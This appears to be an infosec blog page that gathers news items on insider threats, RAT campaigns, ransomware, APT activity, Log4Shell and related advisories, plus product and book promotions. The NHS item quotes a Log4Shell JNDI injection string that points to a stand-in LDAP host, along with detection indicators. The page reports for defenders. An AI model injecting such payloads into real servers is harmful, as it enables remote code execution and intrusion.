InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
ISO 27001 certification requires organizations to prove their compliance with the Standard with appropriate documentation, which can run to thousands of pages for more complex businesses. But with the ISO 27001 Cybersecurity Toolkit, you have all the direction and tools at hand to streamline your project.
ISO 27001 Cybersecurity Toolkit Accelerate your ISO 27001 cybersecurity project and benefit from ready-to-use policies and procedures. The toolkit includes: A complete set of mandatory and supporting documentation templates Helpful project tools to ensure complete coverage of the Standard Guidance documents and direction from expert ISO 27001 practitioners
On the last point, one high-profile case illustrated the potential consequences of this behavior: two General Electric employees started a competing company based on trade secrets that they downloaded at work. These two former GE employees ended up with a prison sentence and a $1.4 million fine – a searing reminder that employees do not have the right to take company data to another company.
While most insider data breaches aren’t quite as malicious or blatant, it’s important to prepare for the worst-case scenario.
What drives insider threat?
An insider threat typically refers to potential attacks from users with internal or remote access inside the system’s firewall or other network perimeter defenses. These “threat actors” can include employees, contractors, third-party vendors and even business partners. In other words, anyone with network access. Potential results include fraud, theft of intellectual property (IP), sabotage of security measures or misconfigurations to allow data leaks.
Of course, not all insider threats come from actual insiders. It’s not hard to imagine instances where, for example, an external party gains access to the physical premises and connects to the network directly, deploying a router in a discreet location for future remote access. This example raises the importance of on-premises security and early detection whenever unapproved devices are added to the network.
A few common examples, like memory sticks or Bluetooth transmitters, can also often pass under the radar. Does your system detect these on insertion? Probably not. This is important because it emphasizes a few key points:
There is no single security solution to cover every possible threat
Insider threats are difficult to pin down without knowing the motivations or patterns of potential attackers.
Threat actors are actively exploiting public cloud services from Amazon and Microsoft to spread RATs such as Nanocore, Netwire, and AsyncRAT used to steal sensitive information from compromised systems.
The malware campaign was spotted by Cisco Talos in October 2021, most of the victims were located in the United States, Italy and Singapore.
Threat actors leverages cloud services like Azure and AWS because they can be easily set up with minimal efforts making it more difficult for defenders to detect and mitigate the campaigns.
The attackers used complex obfuscation techniques in the downloader script.
The attack chains starts with a phishing email using a malicious ZIP attachment that contain an ISO image with a loader in the form of JavaScript, a Windows batch file or Visual Basic script. Upon executing the initial script, the victim’s machine download the next stage from the C2 server, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance.
“To deliver the malware payload, the actor registered several malicious subdomains using DuckDNS, a free dynamic DNS service. The malware families associated with this campaign are variants of the Netwire, Nanocore and AsyncRAT remote access trojans.” reads the analysis published by Talos. “Organizations should be inspecting outgoing connections to cloud computing services for malicious traffic. The campaigns described in this post demonstrate increasing usage of popular cloud platforms for hosting malicious infrastructure.”
Once installed the malware on the target system, it can be used to steal confidential data or to deliver additional payloads such as ransomware attacks. Threat actors can also sell the access to other cybercrime gangs, including ransomware affiliates.
“Organizations should deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages and break the infection chain as early as possible.” concludes the report that also includes Indicators of Compromise (IoCs).
This bug was one of seven of this month’s security holes that could lead to remote code execution (RCE), the sort of bug that means someone outside your network could trick a computer inside your network into running some sort of program without asking for permission first.
No need to log in up front; no pop-up warning at the other end; no Are you sure (Y/N)? questions.
Just give the order, and the malware runs.
That’s the theory, anyway.
RCE bugs considered wormable
One thing to remember about most RCE vulnerabilities is that if you can attack someone else’s computer from outside and instruct it to run a malicious program of your choice…
…then it’s possible, perhaps even probable, that you could tell it to run the very same program that you yourself just used to launch your own attack.
In other words, you might be able to use the vulnerability to locate and infect Victim 1 with malicious program W that instructs Victim 1 to locate and infect Victim 2 with malicious program W that instructs Vicitm 2 to locate Victim 3… and so on, perhaps even ad infinitum.
In an attack like this, we give the program W a special name: we call it a worm.
Worms form a proper subset of a type of malicious software (or malware for short) known generally as computer viruses, the overarching term for self-replicating malware of any sort.
This means that most RCE bugs are, in theory at least, wormable, meaning that they could potentially be exploited to initiate a chain of automatic, self-spreading and self-sustaining malware infections.
The reasoning here is obvious: if an RCE bug allows you to run an arbitrary program of your own choice, such as CALC.EXE or NOTEPAD, then it almost certainly allows you to run a specific program of your choice, such as a worm.
The Conficker worm infected its first computer in November 2008 and within a month had infiltrated 1.5 million computers in 195 countries. Banks, telecommunications companies, and critical government networks (including the British Parliament and the French and German military) were infected. No one had ever seen anything like it. By January 2009 the worm lay hidden in at least eight million computers and the botnet of linked computers that it had created was big enough that an attack might crash the world.
An India-linked threat actor, tracked as Patchwork (aka Dropping Elephant), employed a new variant of the BADNEWS backdoor, dubbed Ragnatela (“spider web” in Italian), in a recent campaign. However, the group made the headlines after infecting its infrastructure with a RAT allowing researchers to analyze its operations.
The APT group has been active since at least 2015, previous operations targeted military and political individuals across the world, it shows a specific interest in organizations in Pakistan.
At the end of 2021, Malwarebytes researchers observed the APT group targeting faculty members whose research focus is on molecular medicine and biological science.
In a recent campaign, the Patchwork group carried out a spear-phishing campaign using weaponized RTF files to drop a variant of the BADNEWS (Ragnatela) Remote Administration Trojan (RAT). The malicious RTF files impersonating Pakistani authorities and exploit a vulnerability in Microsoft Equation Editor to deliver and execute the final payload (RAT). Malwarebytes researchers reported that that payload is stored within the RTF document as an OLE object.
The Ragnatela RAT was developed in late November as seen in its Program Database (PDB) path “E:\new_ops\jlitest __change_ops -29no – Copy\Release\jlitest.pdb” and was employed in cyberespionage campaigns.
The Ragnatela RAT allows threat actors to carry out malicious actions such as:
Executing commands via cmd
Capturing screenshots
Logging Keystrokes
Collecting list of all the files in victim’s machine
Collecting list of the running applications in the victim’s machine at a specific time periods
Downing addition payloads
Uploading files
The list of victims of this campaign includes the Ministry of Defense- Government of Pakistan, the National Defense University of Islam Abad, the Faculty of Bio-Science, UVAS University (Lahore, Pakistan), the International center for chemical and biological sciences, the HEJ Research institute of chemistry, International center for chemical and biological sciences, the univeristy of Karachi SHU University, Molecular medicine.
“Another – unintentional – victim is the threat actor himself which appears to have infected is own development machine with the RAT. We can see them running both VirtualBox and VMware to do web development and testing. Their main host has dual keyboard layouts (English and Indian).” reads the report published by Malwarebytes.
Attribution of Advanced Persistent Threats: How to Identify the Actors Behind Cyber-Espionage
While protecting digital resources may be easy for large companies that can afford to hire in-house cybersecurity staff and establish threat monitoring and endpoint detection infrastructure, this endeavor can often seem impossible for SMBs. All the while, the dangers for smaller businesses could not be more acute, especially since the businesses’ operators and employees are often uninformed about common cybersecurity threats.
By understanding the threats they face and implementing a few relatively low-effort but highly effective protection measures, SMBs can leap into the next phase of growth with their digital assets secured.
Unique threats to SMBs
The scope of cybersecurity threats to small companies is no less varied than the threats large multinational corporations face, but SMBs’ size and lack of infrastructure often leaves them more vulnerable to targeted hacking schemes and threats. Hackers often opt for schemes that require less preparation and risk and find easier targets in SMBs.
One major vulnerability is the disadvantage SMBs face because they often do not control every aspect of their supply chain. A bad actor can conduct a software supply chain hack, isolating smaller vendors and suppliers as weak points with little to no cybersecurity protection, forcing them to unwittingly pass on malware that can disable an entire chain of businesses. SMBs in the logistics and operations industries are particularly vulnerable targets since they are connected to many other companies and will likely be more willing to pay the ransom to quickly resume operations at 100% capacity.
In addition, an entirely new slew of cyber threats has cropped up along with the hybrid work model. In a rush to digitize at the start of the pandemic, many SMBs relied on single systems that they perceived to be safe, including migrating their files and processes to the cloud. They hoped that the cloud’s decentralized nature would prevent them from being victimized by cyber attackers. However, even cloud software providers can be infiltrated, as all it takes is one bug to create a vulnerability. Yet most SMBs fail to acknowledge the new vulnerabilities remote work creates and are now even more vulnerable since they are complacently conducting business through unsecured systems.
All these threats represent a growing danger to SMBs’ success – and some SMBs are more vulnerable than others. Many of the industries (e.g., agriculture) that never thought they would be targeted and therefore eschewed any type of basic cybersecurity are years behind in their cyber protection measures.
) in the Log4j library to gain access to VMware Horizon systems.
The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen to the victims that will not pay the ransom.
Researchers from MalwareHunterteam first spotted the ransomware family, once encrypted a file, the ransomware appends the ‘.nightsky‘ extension to encrypted file names.
In early January, threat actors started targeting VMware Horizon systems exposed on the Internet. VMware has addressed Log4Shell in Horizon with the release of 2111, 7.13.1, 7.10.3 versions, but unfortunately many unpatched systems are still exposed online.
On Monday, Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.
We have observed a China-based ransomware operator that we’re tracking as DEV-0401 exploiting the CVE-2021-44228 vulnerability in Log4j 2 (aka #log4shell) targeting internet-facing systems running VMWare Horizon. https://t.co/6GOdRwRTjk
— Microsoft Security Intelligence (@MsftSecIntel) January 11, 2022
Here are some resolutions to follow to ensure your organization safely navigates the new hybrid office model.
1. Increase security awareness. The human factor is always the weakest link in cybersecurity. CISOs must stretch communications skills and create new channels to deliver education about information security. They must expand messages beyond phishing warnings to include topics such as laws and regulations that connect security with the business. Information privacy is a key topic.
2. Know who is connecting. Throughout the pandemic, the challenge of secure connectivity has been persistent. The bottom line is that secure VPN, single sign-on, and two/multi factor authentication are a must to validate and only allow in authentic users. Access and security logs must be carefully analyzed to identify any suspicious activity.
3. Secure VPNs and patch updates. VPNs hit the headlines at the start of the pandemic because many companies reinstated VPNs that were previously disabled without patching them first. Hackers took advantage of the situation, scanning for devices that they could exploit. Routine patching must be part of the security model and must be a top priority when it comes to safeguarding a business with work-from-home employees.
4. Secure the cloud. The cloud and “on demand” models have become hugely important for helping users access the applications they need to do work from anywhere. While this shift to the cloud has its productivity benefits, it has not come without its security challenges. It is important to remember that cloud environments are not automatically secure when they are first created. Securing them requires knowledge and time. To keep business safe, security controls must span all environments – providing 360-degree application protection for both the application surface and the cloud application infrastructure.
5. Know your suppliers. The SolarWinds vulnerability highlighted the need for companies to thoroughly evaluate the tools and services they integrate into their operations. This includes the careful installation and configuration of the product or service, tracking patches and new releases from the vendor, and monitoring for any suspicious behavior. In a highly sensitive environment, some companies may choose not to use third-party products or services.
6. Know the enemy. From nation-state attacks and climate hacktivists to disgruntled employees, security teams need to understand the techniques, tactics, and procedures used by malicious actors. By getting to know their adversaries, security will be better prepared to detect and evict threat actors who might be targeting their environment. Many security companies issue threat alerts that can be used to gather the latest intel to inform a security strategy. Continuous monitoring and analysis are required to detect and respond to these threats as soon as possible.
7. Maintain visibility. Companies need to make sure they can maintain visibility and consistency of security control posture across a collection of platforms, infrastructures, and technologies. Having visibility and control via security and development dashboards is a must. These dashboards should provide actionable analytics, automation, and customized controls.
8. Balance the load. Companies need sufficient capacity to balance the load on the network and scale to meet the needs of remote workers. After all, there is no point in having a secure network if every time it is accessed by large numbers of employees it fails because it can’t cope with demand. Since employee productivity depends on applications being available and accessible, CISOs must find appropriate solutions that provide business continuity. Those with multiple data centers should use global load balancing to ensure availability across data centers and the cloud.
CISOs have much to address moving forward in the new year. Fortunately, these eight resolutions can help ensure continuous improvements for safely navigating the new (out-of-) office reality.
The US National Counterintelligence and Security Center (NCSC) and the Department of State have published joint guidance that provides best practices on defending against attacks carried out by threat actors using commercial surveillance tools.
In the last years, we have reported several cases of companies selling commercial surveillance tools to governments and other entities that have used them for malicious purposes.
Surveillance tools can be used to record audio, including phone calls, track the phone’s location, and access and retrieve all content on a phone (i.e. text messages, files, chats, commercial messaging app content, contacts, and browsing history).
These tools were used in attacks aimed at journalists, dissidents, and other persons around the world.
“Journalists, dissidents, and other persons around the world have been targeted and tracked using these tools, which allow malign actors to infect mobile and internet-connected devices with malware over both WiFi and cellular data connections.” reads the guidance. “In some cases, malign actors can infect a targeted device with no action from the device owner. In others, they can use an infected link to gain access to a device.”
Below is the list of cybersecurity practices recommended by the NCSC and the US State Department to mitigate the risk of exposure to attacks using these tools:
Regularly update device operating systems and mobile applications.
Be suspicious of content from unfamiliar senders, especially those which contain links or attachments.
Don’t click on suspicious links or suspicious emails and attachments.
Check URLs before clicking links, or go to websites directly.
Regularly restart mobile devices, which may help damage or remove malware implants.
Encrypt and password protect your device.
Maintain physical control of your device when possible.
Use trusted Virtual Private Networks.
Disable geo-location options and cover camera on devices.
While these steps mitigate risks, they don’t eliminate them. It’s always safest to behave as if the device is compromised, so be mindful of sensitive content.
Big Brother Technology: PRISM, XKeyscore, and other Spy Tools of the Global Surveillance State
Ambassador Middendorf delivers a seminal book for understanding military competition in an era of great-power competition. No one who is serious about the future security, prosperity and freedom of America should neglect this essential read.
Ambassador Bill Middendorf makes one unambiguous argument in his new book, The Great Nightfall: Why We Must Win the New Cold War. America won’t survive and thrive in an era of great-power competition without a strong, dominant military. There is one reason for that. China.
Middendorf has given a full lifetime of service to the nation, from his days at sea during World War II to diplomatic assignments and government posts. Among the latter, a turn as Secretary of the Navy. He was instrumental in designing the naval forces that completely outmatched the Soviets during the Cold War. Today, he remains America’s maritime Henry Kissinger, the nation’s preeminent thinker on naval modernization.
In The Great Nightfall, Middendorf deconstructs great-power competition. Regardless of how many internet trolls, little green men, bank accounts and businesses a state controls, it’s not enough to make the state a great power. That requires real military power.
Without the capacity to physically defend national interests, big states are fat banks waiting to be robbed. In contrast, nations that can defend themselves have a foundation on which to build sustainable diplomatic, economic and political policies. “The Cold War ended,” Middendorf argues in The Great Nightfall, “because we were the strongest military force in the world, backed by a unified NATO and strong allies in the Pacific.”
In short, in great-power competition, force is the coin of the realm. The problem with contemporary competition, Middendorf notes, is that “[t]imes have changed.” China is on a path to challenge the United States for number one.
One of the attributes the great-power competition shares with the Cold War is that our adversaries would prefer to “win without fighting.” In other words, they want to achieve victory without the debilitating costs and risks of direct military conflict. These opponents are predisposed to adopt indirect approaches to whittle-away at the strength and solidarity of the free world. That said, military competition plays an important role in their calculus, particularly for China. Chinese strategy envisions ultimately demonstrating sufficient military dominance that Beijing can intimidate other nations and bend them to its will.
In some ways, the new era of great-power competition resembles a new type of arms race. And, as was the case during the Cold War, there are concerns that the competition could turn into armed confrontation. Indeed, The Great Nightfallmaps out several scenarios—from North Korea to the South China Seas—where great powers could actually come to blows.
The Great Nightfall, however, is fundamentally a book about how the United States can establish conventional and strategic deterrence in the modern world. “This book is not a call for war,” writes the author. “The best way to prepare for war is to be prepared to win it. We need to stop underfunding the military, especially in areas of research, non-conventional war, space, cyberwar, and artificial intelligence. War is changing, and we need to change with it. We cannot expect success fighting tomorrow’s conflicts with yesterday’s weapons.”
Middendorf’s blueprint for protecting America in the twenty-first century stands out in two ways. First, he provides a detailed assessment of how to protect the U.S. capacity to build and sustain a modern military. Here, he addresses issues from research and development, to establishing secure, “clean” supply chains, to ship-building. Second, he delivers a comprehensive overview of future U.S. naval needs.
It is not just his naval service and stint as Secretary of the Navy that lead the ambassador to focus on seapower. Fundamentally, China’s potential as a global threat is rooted in its ability to project maritime power. And naval power, in the modern sense, is multidimensional, linking the ability to sail the seas with undersea warfare, air, space, and cyber operations.
The outstanding contribution of The Great Nightfall is its extraordinarily deep evaluation of all aspects of naval power, covering the nature of the Chinese threats and the appropriate countermeasures. In the end, Middendorf delivers a seminal book for understanding military competition in an era of great-power competition. No one who is serious about the future security, prosperity and freedom of America should neglect this essential read.
With great power comes great responsibility and CIOs (Chief Information Office) of an organization are no different. Technology is always changing, it is a very difficult job to keep up with the changes. CIOs are expected to be aware of and have a detailed understanding of major IT industry trends, new technologies, and IT best practices that could benefit the organization.
In the current scenario, cloud computing is dominating the market. So, what are the interesting cloud computing facts that every CIO is expected to be aware of in 2022? Did you know facts about cloud computing before landing here? Let’s discuss this in detail.
A useful advice from Cybersecurity Learning Saturday event. Cybersecurity Learning Saturday is a free program to help folks to build their professional careers. #cybersecurity#career #InfoSeccareer
“It’s Log4Shell, Jim,” as Commander Spock never actually said, “But not as we know it.”
That’s the briefest summary we can come up with of the bug CVE-2021-42392, a security hole recently reported by researchers at software supply chain management company Jfrog.
This time, the bug isn’t in Apache’s beleagured Log4j toolkit, but can be found in a popular Java SQL server called the H2 Database Engine.
H2 isn’t like a traditional SQL system such as MySQL or Microsoft SQL server.
Although you can run H2 as a standalone server for other apps to connect into, its main claim to fame is its modest size and self-contained nature.
As a result, you can bundle the H2 SQL database code right into your own Java apps, and run your databases entirely in memory, with no need for separate server processes.
As with Log4j, of course, this means that you may have running instances of the H2 Database Engine code inside your organization without realizing it, if you use any apps or development components that themselves quietly include it.
The security team at the UK National Health Service (NHS) announced to have spotted threat actors exploiting the Log4Shell vulnerability to hack VMWare Horizon servers and install web shells.
“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.” reads the security advisory published by NHS.
“The attack likely consists of a reconnaissance phase, where the attacker uses theJava Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure. Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”
Once installed a web shell, threat actors can use it to carry out a broad range of malicious activities, such as deploying data exfiltration or deployment of ransomware.
In mid-December, experts reported that the Conti ransomware gang was the first professional group that leveraged Log4Shell exploit to compromise VMware vCenter Server installs. The ransomware group used the exploit to target internal devices that are not protected.
The CVE-2021-44228 flaw made the headlines in December, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability (aka Log4Shell) that affects the Apache Log4j Java-based logging library.
According to the NHS, threat actors are looking for unpatched VMWare Horizon servers to exploit the Log4Shell vulnerability.
The attackers employed a Log4Shell payload similar to ${jndi:ldap://example.com}, then launches a PowerShell command, spawned from ws_TomcatService.exe.
When the attackers find a vulnerable server, they use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.
NHS recommends organizations to look for the following indicators of exploitation:
Evidence of ws_TomcatService.exe spawning abnormal processes
Any powershell.exe processes containing ‘VMBlastSG’ in the commandline
File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is generally overwritten during upgrades, and not modified
Affected organizations should review the VMware Horizon section of the VMware security advisory (VMSA-2021-0028) and apply security updates or mitigations as soon as possible.
![Cybersecurity for Small and Midsize Businesses by [Marlon Bermudez]](https://m.media-amazon.com/images/I/517vkrt898L.jpg)
![Hybrid Work Management: How to Manage a Hybrid Team in the New Workplace (A super-short book about how to analyze, plan, manage, and evaluate your team’s hybrid work arrangement) by [Hassan Osman]](https://m.media-amazon.com/images/I/41XzC+EMOFL.jpg)
